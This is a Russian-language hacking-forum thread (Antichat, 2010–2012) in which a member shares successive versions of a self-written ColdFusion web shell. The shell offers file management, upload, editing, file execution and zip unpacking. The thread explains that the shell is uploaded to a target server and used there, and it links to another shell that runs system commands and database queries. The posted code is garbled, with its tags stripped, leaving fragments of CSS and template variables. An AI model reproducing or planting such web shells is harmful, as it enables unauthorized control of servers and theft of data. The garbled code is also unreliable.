ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
05.11.2010, 22:43
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Облазив интернет в поисках cfm шелла, я так и не нашел ничего кроме одного шелла, который я думаю все знают: это шелл в котором можно запустить файл. Но в моём случае нельзя было запустить файлы, поэтому пришлось писать свой шелл.
CFMshell v. 1.0
- файлменеджер(удаление, переинование файлов/директорий, создание директорий)
- редактирование файлов
- заливка файлов
- запуск файлов
http://pastebin.com/hKS5k792
Код:
Code:
td {border:1px solid black;}
table {border-collapse: collapse;}
#header {background-color: black;color:white;}
#header td { border-color:white; }
a {color:black}
#sc#
Current dirvalue = "#CP#" >
Upload file
Create dir
Filename to exec:#CP#">
Options:
NameSizeTypeModifiedAttrModeAction
[..]
[#directories.name#]
#directories.size#
#directories.type#
#directories.dateLastModified#
#directories.attributes#
#directories.mode#
D R
#files.name#
#files.size#
#files.type#
#files.dateLastModified#
#files.attributes#
#files.mode#
D R
#CP#">
#Fcont#
Save#getDirectoryFromPath(CP)#';document.frm.submit();">Back
З.Ы. сильно не пинайте, ибо coldfusion я не знаю совсем |
|
|
06.11.2010, 00:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
лучше чем ничего, молодец
|
|
|
|
23.11.2010, 18:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
CFMshell v. 1.1
- устранил баг со слеширование на windows платформе(крокозяблы получались всякие)
- устарнил баг с просмотром файлов, если в них есть textarea
- добавил возможно разархивирования zip-архивов(CF 8+ если не ошибаюсь)
- сделал более приятный интерфейс
_http://pastebin.com/pu04UCq9
Код:
Code:
#rounded-corner {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;}
#current-path {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;margin:0px;margin-bottom:2px;padding:10px 0px;background:#b9c9fe}
#rounded-corner thead th.rounded-q1 {background: #b9c9fe;}
#rounded-corner thead th.rounded-q4 {background: #b9c9fe;width:100px}
#rounded-corner th {padding: 8px;font-weight: normal;font-size: 13px;color: #039;background: #b9c9fe;}
#rounded-corner td {padding: 8px;background: #e8edff;border-top: 1px solid #fff;color: #669;}
#rounded-corner tbody tr:hover td {background: #d0dafd;}
a {color:black}
#sc#
Current dirvalue = "#CP#" >
Upload file
Create dir
Filename to exec#CP#">
Options
Zip archive#CP#">
Folder to unpack#CP#">
NameSizeTypeModifiedAttributesModeAction
[..]
[#directories.name#]
#directories.size#
#directories.type#
#directories.dateLastModified#
#directories.attributes#
#directories.mode#
Del Rnm
#files.name#
#files.size#
#files.type#
#files.dateLastModified#
#files.attributes#
#files.mode#
Del Rnm
#CP#
#CP#">
#HTMLEditFormat(Fcont)#
Save#getDirectoryFromPath(CP)#';document.frm.submit();" style="width:100px">Back
|
|
|
|
24.11.2010, 02:35
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 408
Провел на форуме:
1105135
Репутация:
35
|
|
Объясните как юзать его)?
|
|
|
|
24.11.2010, 03:17
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
эмм... а что непонятного? cfm -> coldfusion -> заливаем аля shell.cfm и юзаем
аналогия: php->php->заливаем wso2.php и юзаем |
|
|
|
09.01.2011, 14:32
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
вывод информации о сервере(пока всё что нашёл)
Код:
Code:
CGI server variable
SERVER_SOFTWARE#CGI.SERVER_SOFTWARE#
SERVER_NAME#CGI.SERVER_NAME#
GATEWAY_INTERFACE#GATEWAY_INTERFACE#
SERVER_PROTOCOL#CGI.SERVER_PROTOCOL#
SERVER_PORT#CGI.SERVER_PORT#
REQUEST_METHOD#CGI.REQUEST_METHOD#
PATH_INFO#CGI.PATH_INFO#
PATH_TRANSLATED#CGI.PATH_TRANSLATED#
SCRIPT_NAME#CGI.SCRIPT_NAME#
QUERY_STRING#CGI.QUERY_STRING#
REMOTE_HOST#CGI.REMOTE_HOST#
REMOTE_ADDR#CGI.REMOTE_ADDR#
AUTH_TYPE#CGI.AUTH_TYPE#
REMOTE_USER#CGI.REMOTE_USER#
AUTH_USER#CGI.AUTH_USER#
REMOTE_IDENT#CGI.REMOTE_IDENT#
CONTENT_TYPE#CGI.CONTENT_TYPE#
CONTENT_LENGTH#CGI.CONTENT_LENGTH#
Server variables
Product Name#Server.ColdFusion.ProductName#
Product Level#Server.ColdFusion.ProductLevel#
Supported Locales#Server.ColdFusion.SupportedLocales#
OS Name#Server.OS.Name#
OS Additional Information#Server.OS.AdditionalInformation#
OS Version#Server.OS.Version#
OS BuildNumber#Server.OS.BuildNumber#
|
|
|
|
09.01.2011, 14:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Мне кажется проще использовать asp шелл, т.к. 90% coldfusion стоит на Windows платформах на которых крутится IIS (который без особых усилий работает с asp). Оставшиеся 10% стоят на linux из под apache и как это часто бывает с установленным php интерпретатором.
А вообще молодец, может и пригодится.
|
|
|
|
19.10.2012, 02:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
нашел очень неплохой шелл на cfm, автор "Sebastien Denis"
файловый менеджер, выполнение системных команд, выполнение запросов к базе. очень удобно вобщем. дерзайте
http://pastebin.com/jk9HPX3A
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
